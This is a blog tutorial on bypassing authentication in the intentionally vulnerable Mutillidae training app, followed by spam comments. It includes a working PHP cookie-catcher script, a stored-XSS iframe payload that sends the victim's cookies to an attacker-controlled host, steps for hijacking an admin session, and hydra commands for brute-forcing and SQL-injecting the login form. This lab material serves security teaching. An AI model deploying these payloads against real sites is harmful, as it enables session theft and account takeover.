BROKEN AUTHENTICATION & SESSION MANAGEMENT IN MUTILLIDAE

Broken Authentication and Session Management is on number 2 in OWASP Top 10 vulnerability list 2013. In mutillidae , it contain three subsection.

  • Authentication Bypass
  • Privilege Escalation
  • Username Enumeration

We have already covered Username enumeration in last article & we got valid username list which exist in database. Today we are going to use authentication bypass method.

  1. Using cookie
  2. Using brute-force
  3. Using SQL injection

(1)Authentication Bypass Using Cookie:- 

As we know that , mutillidae is vulnerable to XSS, so we can capture cookie with help of XSS. We are going to take advantage of persistent XSS.

http://127.0.0.1/mutillidae/index.php?page=add-to-your-blog.php

Above link is vulnerable to persistent XSS attack. We can submit html to add blog section.so we are going to use cookie-catcher.

Content of cookie_catcher.php :-

<?php
header ("Location: http://192.168.56.1");
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");;
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.html', 'a');
fwrite($fp, 'Cookie: '.$cookie.'<br> IP: ' .$ip. '<br> Date and Time: ' .$date. '<br> Referer: '.$referer.'<br><br><br>');
fclose($fp);
?>

Upload your cookie_catcher.php to server. For demo i used my local apache server & after execution of script it will redirect to 192.168.56.1.You can change the code according to your need. It will grab IP, cookie, Referer, time & date.

Now as anonymous user , we will add blog entry.I used other OS on my virtual box for attack.

(1)Open http://192.168.56.1/mutillidae/index.php?page=add-to-your-blog.php

(2)Submit following html to blog

<html>
<body>
<b> nirav k desai</b>
<u>help me</u>
<iframe frameboarder=0 height=0 width=0 src=javascript:void(document.location="http://192.168.56.1/cookie_catcher.php?c="+document.cookie) </iframe >
</body>
</html>

authentication-bypass-using-cokkie

Replace Link http://192.168.56.1/cookie_catcher.php to your uploaded cookie_catcher.php

(3)Now when "admin" or any "logged user" show your added blog entry , you will get his cookie, i.p., date & time.

persistent-xss

(4)To view cookie open cookie.html.

cookie-catcher
 
(5)Now you can use any cookie manager add-on to edit cookie; replace cookie which we got.

cookie-manager

(6)After reload we got admin access to web-application.

admin-access

(2)Authentication Bypass Using Bruteforce:- 

You can use hydra or burpe intruder to bruteforce login form of application.

hydra -l admin -P /root/pass.txt  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

Bruteforce-Using-Hydra

(3)Authentication Bypass Using Sql Injection:- 

We can inject special database characters or SQL timing attacks into page parameters. We are going to use login page; and inject sql character to  login form.

You can use SQL injection cheat sheet & we will brute-force  using SQL statements.Save it to file.

hydra -l admin -P /root/sql 127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

SQL-injection_cheat-sheet

And we got for valid SQL statements ; with help of it we can bypass admin panel.

14 comments:

  1. If you need a good college planner you should check out this little blog post first of all. It has some good ideas in it

    ReplyDelete
    Replies
    1. Great Article Cloud Computing Projects

      Networking Projects

      Final Year Projects for CSE

      JavaScript Training in Chennai

      JavaScript Training in Chennai

      The Angular Training covers a wide range of topics including Components, Angular Directives, Angular Services, Pipes, security fundamentals, Routing, and Angular programmability. The new Angular TRaining will lay the foundation you need to specialise in Single Page Application developer. Angular Training

      Delete
  2. Thanks for sharing such a nice blog. I like it.
    webroot customer service

    ReplyDelete
  3. Thanks for sharing such a nice Blog.I like it.
    Windows 7 Customer Service

    ReplyDelete